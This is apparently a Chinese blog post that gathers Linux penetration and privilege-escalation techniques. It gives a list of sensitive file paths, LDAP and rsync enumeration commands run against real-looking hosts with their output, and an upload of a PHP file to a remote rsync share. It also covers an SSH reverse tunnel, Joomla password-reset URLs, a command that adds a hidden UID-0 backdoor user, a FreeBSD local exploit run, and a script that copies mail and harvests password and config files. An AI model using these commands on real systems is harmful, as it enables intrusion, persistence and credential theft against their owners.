LINUX渗透与提权总结
本文为Linux渗透与提权技巧总结篇,旨在收集各种Linux渗透技巧与提权版本,方便各位同学在日后的渗透测试中能够事半功倍。
Linux 系统下的一些常见路径:
001
|
/etc/passwd
|
002
|
003
|
/etc/shadow
|
004
|
005
|
/etc/fstab
|
006
|
007
|
/etc/host.conf
|
008
|
009
|
/etc/motd
|
010
|
011
|
/etc/ld.so.conf
|
012
|
013
|
/var/www/htdocs/index.php
|
014
|
015
|
/var/www/conf/httpd.conf
|
016
|
017
|
/var/www/htdocs/index.html
|
018
|
019
|
/var/httpd/conf/php.ini
|
020
|
021
|
/var/httpd/htdocs/index.php
|
022
|
023
|
/var/httpd/conf/httpd.conf
|
024
|
025
|
/var/httpd/htdocs/index.html
|
026
|
027
|
/var/httpd/conf/php.ini
|
028
|
029
|
/var/www/index.html
|
030
|
031
|
/var/www/index.php
|
032
|
033
|
/opt/www/conf/httpd.conf
|
034
|
035
|
/opt/www/htdocs/index.php
|
036
|
037
|
/opt/www/htdocs/index.html
|
038
|
039
|
/usr/local/apache/htdocs/index.html
|
040
|
041
|
/usr/local/apache/htdocs/index.php
|
042
|
043
|
/usr/local/apache2/htdocs/index.html
|
044
|
045
|
/usr/local/apache2/htdocs/index.php
|
046
|
047
|
/usr/local/httpd2.2/htdocs/index.php
|
048
|
049
|
/usr/local/httpd2.2/htdocs/index.html
|
050
|
051
|
/tmp/apache/htdocs/index.html
|
052
|
053
|
/tmp/apache/htdocs/index.php
|
054
|
055
|
/etc/httpd/htdocs/index.php
|
056
|
057
|
/etc/httpd/conf/httpd.conf
|
058
|
059
|
/etc/httpd/htdocs/index.html
|
060
|
061
|
/www/php/php.ini
|
062
|
063
|
/www/php4/php.ini
|
064
|
065
|
/www/php5/php.ini
|
066
|
067
|
/www/conf/httpd.conf
|
068
|
069
|
/www/htdocs/index.php
|
070
|
071
|
/www/htdocs/index.html
|
072
|
073
|
/usr/local/httpd/conf/httpd.conf
|
074
|
075
|
/apache/apache/conf/httpd.conf
|
076
|
077
|
/apache/apache2/conf/httpd.conf
|
078
|
079
|
/etc/apache/apache.conf
|
080
|
081
|
/etc/apache2/apache.conf
|
082
|
083
|
/etc/apache/httpd.conf
|
084
|
085
|
/etc/apache2/httpd.conf
|
086
|
087
|
/etc/apache2/vhosts.d/00_default_vhost.conf
|
088
|
089
|
/etc/apache2/sites-available/default
|
090
|
091
|
/etc/phpmyadmin/config.inc.php
|
092
|
093
|
/etc/mysql/my.cnf
|
094
|
095
|
/etc/httpd/conf.d/php.conf
|
096
|
097
|
/etc/httpd/conf.d/httpd.conf
|
098
|
099
|
/etc/httpd/logs/error_log
|
100
|
101
|
/etc/httpd/logs/error.log
|
102
|
103
|
/etc/httpd/logs/access_log
|
104
|
105
|
/etc/httpd/logs/access.log
|
106
|
107
|
/home/apache/conf/httpd.conf
|
108
|
109
|
/home/apache2/conf/httpd.conf
|
110
|
111
|
/var/log/apache/error_log
|
112
|
113
|
/var/log/apache/error.log
|
114
|
115
|
/var/log/apache/access_log
|
116
|
117
|
/var/log/apache/access.log
|
118
|
119
|
/var/log/apache2/error_log
|
120
|
121
|
/var/log/apache2/error.log
|
122
|
123
|
/var/log/apache2/access_log
|
124
|
125
|
/var/log/apache2/access.log
|
126
|
127
|
/var/www/logs/error_log
|
128
|
129
|
/var/www/logs/error.log
|
130
|
131
|
/var/www/logs/access_log
|
132
|
133
|
/var/www/logs/access.log
|
134
|
135
|
/usr/local/apache/logs/error_log
|
136
|
137
|
/usr/local/apache/logs/error.log
|
138
|
139
|
/usr/local/apache/logs/access_log
|
140
|
141
|
/usr/local/apache/logs/access.log
|
142
|
143
|
/var/log/error_log
|
144
|
145
|
/var/log/error.log
|
146
|
147
|
/var/log/access_log
|
148
|
149
|
/var/log/access.log
|
150
|
151
|
/usr/local/apache/logs/access_logaccess_log.old
|
152
|
153
|
/usr/local/apache/logs/error_logerror_log.old
|
154
|
155
|
/etc/php.ini
|
156
|
157
|
/bin/php.ini
|
158
|
159
|
/etc/init.d/httpd
|
160
|
161
|
/etc/init.d/mysql
|
162
|
163
|
/etc/httpd/php.ini
|
164
|
165
|
/usr/lib/php.ini
|
166
|
167
|
/usr/lib/php/php.ini
|
168
|
169
|
/usr/local/etc/php.ini
|
170
|
171
|
/usr/local/lib/php.ini
|
172
|
173
|
/usr/local/php/lib/php.ini
|
174
|
175
|
/usr/local/php4/lib/php.ini
|
176
|
177
|
/usr/local/php4/php.ini
|
178
|
179
|
/usr/local/php4/lib/php.ini
|
180
|
181
|
/usr/local/php5/lib/php.ini
|
182
|
183
|
/usr/local/php5/etc/php.ini
|
184
|
185
|
/usr/local/php5/php5.ini
|
186
|
187
|
/usr/local/apache/conf/php.ini
|
188
|
189
|
/usr/local/apache/conf/httpd.conf
|
190
|
191
|
/usr/local/apache2/conf/httpd.conf
|
192
|
193
|
/usr/local/apache2/conf/php.ini
|
194
|
195
|
/etc/php4.4/fcgi/php.ini
|
196
|
197
|
/etc/php4/apache/php.ini
|
198
|
199
|
/etc/php4/apache2/php.ini
|
200
|
201
|
/etc/php5/apache/php.ini
|
202
|
203
|
/etc/php5/apache2/php.ini
|
204
|
205
|
/etc/php/php.ini
|
206
|
207
|
/etc/php/php4/php.ini
|
208
|
209
|
/etc/php/apache/php.ini
|
210
|
211
|
/etc/php/apache2/php.ini
|
212
|
213
|
/web/conf/php.ini
|
214
|
215
|
/usr/local/Zend/etc/php.ini
|
216
|
217
|
/opt/xampp/etc/php.ini
|
218
|
219
|
/var/local/www/conf/php.ini
|
220
|
221
|
/var/local/www/conf/httpd.conf
|
222
|
223
|
/etc/php/cgi/php.ini
|
224
|
225
|
/etc/php4/cgi/php.ini
|
226
|
227
|
/etc/php5/cgi/php.ini
|
228
|
229
|
/php5/php.ini
|
230
|
231
|
/php4/php.ini
|
232
|
233
|
/php/php.ini
|
234
|
235
|
/PHP/php.ini
|
236
|
237
|
/apache/php/php.ini
|
238
|
239
|
/xampp/apache/bin/php.ini
|
240
|
241
|
/xampp/apache/conf/httpd.conf
|
242
|
243
|
/NetServer/bin/stable/apache/php.ini
|
244
|
245
|
/home2/bin/stable/apache/php.ini
|
246
|
247
|
/home/bin/stable/apache/php.ini
|
248
|
249
|
/var/log/mysql/mysql-bin.log
|
250
|
251
|
/var/log/mysql.log
|
252
|
253
|
/var/log/mysqlderror.log
|
254
|
255
|
/var/log/mysql/mysql.log
|
256
|
257
|
/var/log/mysql/mysql-slow.log
|
258
|
259
|
/var/mysql.log
|
260
|
261
|
/var/lib/mysql/my.cnf
|
262
|
263
|
/usr/local/mysql/my.cnf
|
264
|
265
|
/usr/local/mysql/bin/mysql
|
266
|
267
|
/etc/mysql/my.cnf
|
268
|
269
|
/etc/my.cnf
|
270
|
271
|
/usr/local/cpanel/logs
|
272
|
273
|
/usr/local/cpanel/logs/stats_log
|
274
|
275
|
/usr/local/cpanel/logs/access_log
|
276
|
277
|
/usr/local/cpanel/logs/error_log
|
278
|
279
|
/usr/local/cpanel/logs/license_log
|
280
|
281
|
/usr/local/cpanel/logs/login_log
|
282
|
283
|
/usr/local/cpanel/logs/stats_log
|
284
|
285
|
/usr/local/share/examples/php4/php.ini
|
286
|
287
|
/usr/local/share/examples/php/php.ini
|
288
|
289
|
/usr/local/tomcat5527/bin/version.sh
|
290
|
291
|
/usr/share/tomcat6/bin/startup.sh
|
292
|
293
|
/usr/tomcat6/bin/startup.sh
|
liunx 相关提权渗透技巧总结,一、ldap 渗透技巧:
1
|
1.cat /etc/nsswitch
|
看看密码登录策略我们可以看到使用了file ldap模式
1
|
2.less /etc/ldap.conf
|
2
|
3
|
base ou=People,dc=unix-center,dc=net
|
找到ou,dc,dc设置
3.查找管理员信息
匿名方式
1
|
ldapsearch -x -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2
|
有密码形式
1
|
ldapsearch -x -W -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2
|
4.查找10条用户记录
1
|
ldapsearch -h 192.168.2.2 -x -z 10 -p 指定端口
|
实战:
1
|
1.cat /etc/nsswitch
|
看看密码登录策略我们可以看到使用了file ldap模式
1
|
2.less /etc/ldap.conf
|
2
|
3
|
base ou=People,dc=unix-center,dc=net
|
找到ou,dc,dc设置
3.查找管理员信息
匿名方式
1
|
ldapsearch -x -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2
|
有密码形式
1
|
ldapsearch -x -W -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2
|
4.查找10条用户记录
1
|
ldapsearch -h 192.168.2.2 -x -z 10 -p 指定端口
|
渗透实战:
1.返回所有的属性
01
|
ldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s sub "objectclass=*"
|
02
|
03
|
version: 1
|
04
|
05
|
dn: dc=ruc,dc=edu,dc=cn
|
06
|
07
|
dc: ruc
|
08
|
09
|
objectClass: domain
|
10
|
11
|
dn: uid=manager,dc=ruc,dc=edu,dc=cn
|
12
|
13
|
uid: manager
|
14
|
15
|
objectClass: inetOrgPerson
|
16
|
17
|
objectClass: organizationalPerson
|
18
|
19
|
objectClass: person
|
20
|
21
|
objectClass: top
|
22
|
23
|
sn: manager
|
24
|
25
|
cn: manager
|
26
|
27
|
dn: uid=superadmin,dc=ruc,dc=edu,dc=cn
|
28
|
29
|
uid: superadmin
|
30
|
31
|
objectClass: inetOrgPerson
|
32
|
33
|
objectClass: organizationalPerson
|
34
|
35
|
objectClass: person
|
36
|
37
|
objectClass: top
|
38
|
39
|
sn: superadmin
|
40
|
41
|
cn: superadmin
|
42
|
43
|
dn: uid=admin,dc=ruc,dc=edu,dc=cn
|
44
|
45
|
uid: admin
|
46
|
47
|
objectClass: inetOrgPerson
|
48
|
49
|
objectClass: organizationalPerson
|
50
|
51
|
objectClass: person
|
52
|
53
|
objectClass: top
|
54
|
55
|
sn: admin
|
56
|
57
|
cn: admin
|
58
|
59
|
dn: uid=dcp_anonymous,dc=ruc,dc=edu,dc=cn
|
60
|
61
|
uid: dcp_anonymous
|
62
|
63
|
objectClass: top
|
64
|
65
|
objectClass: person
|
66
|
67
|
objectClass: organizationalPerson
|
68
|
69
|
objectClass: inetOrgPerson
|
70
|
71
|
sn: dcp_anonymous
|
72
|
73
|
cn: dcp_anonymous
|
2.查看基类
1
|
bash-3.00 # ldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s base "objectclass=*" | more version: 1 dn: dc=ruc,dc=edu,dc=cn dc: ruc objectClass: domain
|
3.查找
001
|
bash-3.00 # ldapsearch -h 192.168.7.33 -b "" -s base "objectclass=*"
|
002
|
003
|
version: 1
|
004
|
005
|
dn:
|
006
|
007
|
objectClass: top
|
008
|
009
|
namingContexts: dc=ruc,dc=edu,dc=cn
|
010
|
011
|
supportedExtension: 2.16.840.1.113730.3.5.7
|
012
|
013
|
supportedExtension: 2.16.840.1.113730.3.5.8
|
014
|
015
|
supportedExtension: 1.3.6.1.4.1.4203.1.11.1
|
016
|
017
|
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.25
|
018
|
019
|
supportedExtension: 2.16.840.1.113730.3.5.3
|
020
|
021
|
supportedExtension: 2.16.840.1.113730.3.5.5
|
022
|
023
|
supportedExtension: 2.16.840.1.113730.3.5.6
|
024
|
025
|
supportedExtension: 2.16.840.1.113730.3.5.4
|
026
|
027
|
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.1
|
028
|
029
|
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.2
|
030
|
031
|
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.3
|
032
|
033
|
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.4
|
034
|
035
|
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.5
|
036
|
037
|
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.6
|
038
|
039
|
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.7
|
040
|
041
|
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.8
|
042
|
043
|
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.9
|
044
|
045
|
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.23
|
046
|
047
|
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.11
|
048
|
049
|
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.12
|
050
|
051
|
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.13
|
052
|
053
|
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.14
|
054
|
055
|
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.15
|
056
|
057
|
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.16
|
058
|
059
|
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.17
|
060
|
061
|
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.18
|
062
|
063
|
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.19
|
064
|
065
|
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.21
|
066
|
067
|
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.22
|
068
|
069
|
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.24
|
070
|
071
|
supportedExtension: 1.3.6.1.4.1.1466.20037
|
072
|
073
|
supportedExtension: 1.3.6.1.4.1.4203.1.11.3
|
074
|
075
|
supportedControl: 2.16.840.1.113730.3.4.2
|
076
|
077
|
supportedControl: 2.16.840.1.113730.3.4.3
|
078
|
079
|
supportedControl: 2.16.840.1.113730.3.4.4
|
080
|
081
|
supportedControl: 2.16.840.1.113730.3.4.5
|
082
|
083
|
supportedControl: 1.2.840.113556.1.4.473
|
084
|
085
|
supportedControl: 2.16.840.1.113730.3.4.9
|
086
|
087
|
supportedControl: 2.16.840.1.113730.3.4.16
|
088
|
089
|
supportedControl: 2.16.840.1.113730.3.4.15
|
090
|
091
|
supportedControl: 2.16.840.1.113730.3.4.17
|
092
|
093
|
supportedControl: 2.16.840.1.113730.3.4.19
|
094
|
095
|
supportedControl: 1.3.6.1.4.1.42.2.27.9.5.2
|
096
|
097
|
supportedControl: 1.3.6.1.4.1.42.2.27.9.5.6
|
098
|
099
|
supportedControl: 1.3.6.1.4.1.42.2.27.9.5.8
|
100
|
101
|
supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1
|
102
|
103
|
supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1
|
104
|
105
|
supportedControl: 2.16.840.1.113730.3.4.14
|
106
|
107
|
supportedControl: 1.3.6.1.4.1.1466.29539.12
|
108
|
109
|
supportedControl: 2.16.840.1.113730.3.4.12
|
110
|
111
|
supportedControl: 2.16.840.1.113730.3.4.18
|
112
|
113
|
supportedControl: 2.16.840.1.113730.3.4.13
|
114
|
115
|
supportedSASLMechanisms: EXTERNAL
|
116
|
117
|
supportedSASLMechanisms: DIGEST-MD5
|
118
|
119
|
supportedLDAPVersion: 2
|
120
|
121
|
supportedLDAPVersion: 3
|
122
|
123
|
vendorName: Sun Microsystems, Inc.
|
124
|
125
|
vendorVersion: Sun-Java(tm)-System-Directory/6.2
|
126
|
127
|
dataversion: 020090516011411
|
128
|
129
|
netscapemdsuffix: cn=ldap://dc=webA:389
|
130
|
131
|
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA
|
132
|
133
|
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
|
134
|
135
|
supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_256_CBC_SHA
|
136
|
137
|
supportedSSLCiphers: TLS_DHE_DSS_WITH_AES_256_CBC_SHA
|
138
|
139
|
supportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_256_CBC_SHA
|
140
|
141
|
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA
|
142
|
143
|
supportedSSLCiphers: TLS_RSA_WITH_AES_256_CBC_SHA
|
144
|
145
|
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_RC4_128_SHA
|
146
|
147
|
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA
|
148
|
149
|
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_RC4_128_SHA
|
150
|
151
|
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
|
152
|
153
|
supportedSSLCiphers: TLS_DHE_DSS_WITH_RC4_128_SHA
|
154
|
155
|
supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_128_CBC_SHA
|
156
|
157
|
supportedSSLCiphers: TLS_DHE_DSS_WITH_AES_128_CBC_SHA
|
158
|
159
|
supportedSSLCiphers: TLS_ECDH_RSA_WITH_RC4_128_SHA
|
160
|
161
|
supportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_128_CBC_SHA
|
162
|
163
|
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_RC4_128_SHA
|
164
|
165
|
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA
|
166
|
167
|
supportedSSLCiphers: SSL_RSA_WITH_RC4_128_MD5
|
168
|
169
|
supportedSSLCiphers: SSL_RSA_WITH_RC4_128_SHA
|
170
|
171
|
supportedSSLCiphers: TLS_RSA_WITH_AES_128_CBC_SHA
|
172
|
173
|
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA
|
174
|
175
|
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA
|
176
|
177
|
supportedSSLCiphers: SSL_DHE_RSA_WITH_3DES_EDE_CBC_SHA
|
178
|
179
|
supportedSSLCiphers: SSL_DHE_DSS_WITH_3DES_EDE_CBC_SHA
|
180
|
181
|
supportedSSLCiphers: TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA
|
182
|
183
|
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA
|
184
|
185
|
supportedSSLCiphers: SSL_RSA_FIPS_WITH_3DES_EDE_CBC_SHA
|
186
|
187
|
supportedSSLCiphers: SSL_RSA_WITH_3DES_EDE_CBC_SHA
|
188
|
189
|
supportedSSLCiphers: SSL_DHE_RSA_WITH_DES_CBC_SHA
|
190
|
191
|
supportedSSLCiphers: SSL_DHE_DSS_WITH_DES_CBC_SHA
|
192
|
193
|
supportedSSLCiphers: SSL_RSA_FIPS_WITH_DES_CBC_SHA
|
194
|
195
|
supportedSSLCiphers: SSL_RSA_WITH_DES_CBC_SHA
|
196
|
197
|
supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_RC4_56_SHA
|
198
|
199
|
supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_DES_CBC_SHA
|
200
|
201
|
supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC4_40_MD5
|
202
|
203
|
supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC2_CBC_40_MD5
|
204
|
205
|
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_NULL_SHA
|
206
|
207
|
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_NULL_SHA
|
208
|
209
|
supportedSSLCiphers: TLS_ECDH_RSA_WITH_NULL_SHA
|
210
|
211
|
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_NULL_SHA
|
212
|
213
|
supportedSSLCiphers: SSL_RSA_WITH_NULL_SHA
|
214
|
215
|
supportedSSLCiphers: SSL_RSA_WITH_NULL_MD5
|
216
|
217
|
supportedSSLCiphers: SSL_CK_RC4_128_WITH_MD5
|
218
|
219
|
supportedSSLCiphers: SSL_CK_RC2_128_CBC_WITH_MD5
|
220
|
221
|
supportedSSLCiphers: SSL_CK_DES_192_EDE3_CBC_WITH_MD5
|
222
|
223
|
supportedSSLCiphers: SSL_CK_DES_64_CBC_WITH_MD5
|
224
|
225
|
supportedSSLCiphers: SSL_CK_RC4_128_EXPORT40_WITH_MD5
|
226
|
227
|
supportedSSLCiphers: SSL_CK_RC2_128_CBC_EXPORT40_WITH_MD5
|
liunx 相关提权渗透技巧总结,二、NFS 渗透技巧:
列举IP:
1
|
showmount -e ip
|
liunx 相关提权渗透技巧总结,三、rsync渗透技巧:
1.查看rsync服务器上的列表:
01
|
rsync 210.51.X.X::
|
02
|
03
|
finance
|
04
|
05
|
img_finance
|
06
|
07
|
auto
|
08
|
09
|
img_auto
|
10
|
11
|
html_cms
|
12
|
13
|
img_cms
|
14
|
15
|
ent_cms
|
16
|
17
|
ent_img
|
18
|
19
|
ceshi
|
20
|
21
|
res_img
|
22
|
23
|
res_img_c2
|
24
|
25
|
chip
|
26
|
27
|
chip_c2
|
28
|
29
|
ent_icms
|
30
|
31
|
games
|
32
|
33
|
gamesimg
|
34
|
35
|
media
|
36
|
37
|
mediaimg
|
38
|
39
|
fashion
|
40
|
41
|
res-fashion
|
42
|
43
|
res-fo
|
44
|
45
|
taobao-home
|
46
|
47
|
res-taobao-home
|
48
|
49
|
house
|
50
|
51
|
res-house
|
52
|
53
|
res-home
|
54
|
55
|
res-edu
|
56
|
57
|
res-ent
|
58
|
59
|
res-labs
|
60
|
61
|
res-news
|
62
|
63
|
res-phtv
|
64
|
65
|
res-media
|
66
|
67
|
home
|
68
|
69
|
edu
|
70
|
71
|
news
|
72
|
73
|
res-book
|
看相应的下级目录(注意一定要在目录后面添加上/)
1
|
rsync 210.51.X.X::htdocs_app/
|
2
|
3
|
rsync 210.51.X.X::auto/
|
4
|
5
|
rsync 210.51.X.X::edu/
|
2.下载rsync服务器上的配置文件
1
|
rsync -avz 210.51.X.X::htdocs_app/ /tmp/app/
|
3.向上更新rsync文件(成功上传,不会覆盖)
1
|
rsync -avz nothack.php 210.51.X.X::htdocs_app/warn/
|
2
|
3
|
http://app.finance.xxx.com/warn/nothack.txt
|
liunx 相关提权渗透技巧总结,四、squid渗透技巧:
1
|
nc -vv 91ri.org 80
|
2
|
3
|
GET HTTP://www.sina.com / HTTP/1.0
|
4
|
5
|
GET HTTP://WWW.sina.com:22 / HTTP/1.0
|
liunx 相关提权渗透技巧总结,五、SSH端口转发:
1
|
ssh -C -f -N -g -R 44:127.0.0.1:22 cnbird@ip
|
liunx 相关提权渗透技巧总结,六、joomla渗透小技巧:
确定版本:
1
|
index.php?option=com_content&view=article&id=30:what-languages-are-supported-by-joomla-15&catid=32:languages&Itemid=47
|
重新设置密码:
1
|
index.php?option=com_user&view=reset&layout=confirm
|
liunx 相关提权渗透技巧总结,七、Linux添加UID为0的root用户:
1
|
useradd -o -u 0 nothack
|
liunx 相关提权渗透技巧总结,八、freebsd本地提权:
01
|
[argp@julius ~]$ uname -rsi
|
02
|
03
|
* freebsd 7.3-RELEASE GENERIC
|
04
|
05
|
* [argp@julius ~]$ sysctl vfs.usermount
|
06
|
07
|
* vfs.usermount: 1
|
08
|
09
|
* [argp@julius ~]$ id
|
10
|
11
|
* uid=1001(argp) gid=1001(argp) groups=1001(argp)
|
12
|
13
|
* [argp@julius ~]$ gcc -Wall nfs_mount_ex.c -o nfs_mount_ex
|
14
|
15
|
* [argp@julius ~]$ ./nfs_mount_ex
|
16
|
17
|
*
|
18
|
19
|
calling nmount()
|
tar 文件夹打包:
1、tar打包:
1
|
tar -cvf /home/public_html/*.tar /home/public_html/--exclude=排除文件*.gif 排除目录 /xx/xx/*
|
2
|
3
|
alzip打包(韩国) alzip -a D:\WEB d:\web*.rar
|
{
注:
关于tar的打包方式,linux不以扩展名来决定文件类型。
若压缩的话tar -ztf *.tar.gz 查看压缩包里内容 tar -zxf *.tar.gz 解压
那么用这条比较好
1
|
tar -czf /home/public_html/*.tar.gz /home/public_html/--exclude= 排除文件*.gif 排除目录 /xx/xx/*
|
}
系统信息收集:
01
|
for linux:
|
02
|
03
|
#!/bin/bash
|
04
|
05
|
echo #######geting sysinfo####
|
06
|
07
|
echo ######usage: ./getinfo.sh >/tmp/sysinfo.txt
|
08
|
09
|
echo #######basic infomation##
|
10
|
11
|
cat /proc/meminfo
|
12
|
13
|
echo
|
14
|
15
|
cat /proc/cpuinfo
|
16
|
17
|
echo
|
18
|
19
|
rpm -qa 2>/dev/null
|
20
|
21
|
######stole the mail......######
|
22
|
23
|
cp -a /var/mail /tmp/getmail 2>/dev/null
|
24
|
25
|
echo 'u'r id is' `id`
|
26
|
27
|
echo ###atq&crontab#####
|
28
|
29
|
atq
|
30
|
31
|
crontab -l
|
32
|
33
|
echo #####about var#####
|
34
|
35
|
set
|
36
|
37
|
echo #####about network###
|
38
|
39
|
####this is then point in pentest,but i am a new bird,so u need to add some in it
|
40
|
41
|
cat /etc/hosts
|
42
|
43
|
hostname
|
44
|
45
|
ipconfig -a
|
46
|
47
|
arp -v
|
48
|
49
|
echo ########user####
|
50
|
51
|
cat /etc/passwd|grep -i sh
|
52
|
53
|
echo ######service####
|
54
|
55
|
chkconfig --list
|
56
|
57
|
for i in {oracle,mysql,tomcat,samba,apache,ftp}
|
58
|
59
|
cat /etc/passwd|grep -i $i
|
60
|
61
|
done
|
62
|
63
|
locate passwd >/tmp/password 2>/dev/null
|
64
|
65
|
sleep 5
|
66
|
67
|
locate password >>/tmp/password 2>/dev/null
|
68
|
69
|
sleep 5
|
70
|
71
|
locate conf >/tmp/sysconfig 2>dev/null
|
72
|
73
|
sleep 5
|
74
|
75
|
locate config >>/tmp/sysconfig 2>/dev/null
|
76
|
77
|
sleep 5
|
78
|
79
|
###maybe can use "tree /"###
|
80
|
81
|
echo ##packing up#########
|
82
|
83
|
tar cvf getsysinfo.tar /tmp/getmail /tmp/password /tmp/sysconfig
|
84
|
85
|
rm -rf /tmp/getmail /tmp/password /tmp/sysconfig
|
LINUX渗透与提权总结相关推荐
- Linux渗透与提权:技巧总结篇
本文为Linux渗透与提权技巧总结篇,旨在收集各种Linux渗透技巧与提权版本,方便各位同学在日后的渗透测试中能够事半功倍. Linux 系统下的一些常见路径: /etc/passwd/etc/sha ...
- Kali Linux渗透测试之提权(二)——WCE、Fgdump、Mimikatz
1. Windows身份认证的过程 在登录目标系统时,会将输入的密码进行lmhash和nthash加密: 然后将加密后的密码与SAM账户数据库进行比对,如果比对匹配,则成功登录操作系统: 如果是远端的 ...
- 103.网络安全渗透测试—[权限提升篇1]—[Linux内核漏洞提权]
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一.LINUX 内核漏洞提权 1.漏洞背景: 2.漏洞利用: (1)实验环境 (2)靶机链接 (3)突破MIME ...
- 渗透测试Metasploit框架体验(5.理解MSF后渗透-之提权)
1.目标机器权限提升 权限提升(privilege escalation) : 攻击者通过安全漏洞把获取到的受限制的低权限用户突破限制,提权至高权限的管理员用户,从而获得对整个系统得控制权.Windo ...
- 内网渗透常用提权方式总结
文章目录 前言 内网提权的常用方法 一.Windows系统内核溢出漏洞提权 1.手动查找系统潜在漏洞 2.使用Windows-Exploit-Suggester 3.使用sherlock 脚本 4.还 ...
- Linux下SUID提权方法
目录 SUID 1. 利用find文件提权 vulnhub靶机DC-1渗透-SUID提权 SUID SUID可以让调用者以文件拥有者的身份运行该文件,所以我们利用SUID提权的思路就是运行root用户 ...
- 渗透测试——提权方式总结
(内容整理自网络) 一. 什么是提权 提权就是通过各种办法和漏洞,提高自己在服务器中的权限,以便控制全局. Windows:User >> System Linux:User >&g ...
- Linux Privilege Escalation Kernel Exploits | Linux本地内核提权漏洞复现 CVE-2015-1328
Linux Privilege Escalation Kernel Exploits | Linux本地内核提权漏洞复现 CVE-2015-1328 文章目录 Linux Privilege Esca ...
- Windows和linux提权方法,Windows与Linux本地用户提权体验(一)
无论是Windows系统还是linux系统都是基于权限控制的,其严格的用户等级和权限是系统安全的有力保证.这么严密的用户权限是否不可逾越呢?下面笔者反其道而行之进行Windows及Linux下的提权测 ...
最新文章
- 把自己分支的内容合并到主分支上
- xshell无法连接linux虚拟机问题的解决办法
- 史上最简单的 SpringCloud 教程 | 第十四篇: 服务注册(consul)
- [图神经网络] 图节点Node表示---GAT
- html5翻卡片游戏,用 JavaScript 写一个卡片小游戏
- python学习笔记之lambda表达式
- android View的层级结构
- 如何设计领域特定语言,实现终极业务抽象?
- zbrush史上最全笔刷下载43G(1200个)
- 程序人生|从网瘾少年到微软、BAT、字节offer收割机逆袭之路
- 高效准确处理scipy.misc 中imresize、imread导入错误问题
- Unity3D -- 天空盒(图文)
- 08-Linux账号管理学习
- Unity 优化Unity切换后台的问题
- 基于JAVA汽车租赁系统计算机毕业设计源码+系统+lw文档+部署
- 【项目预估】PERT(计划评审技术)
- HTML5印章绘制电子签章图片,中文英文椭圆章、中文英文椭圆印章 电子签章图片采集
- 30_linux笔记-文件系统
- 看了诺奖得主的故事,我只说五个字:狂野酷姐姐
- Vue报错:Root file specified for compilation Vetur(1261)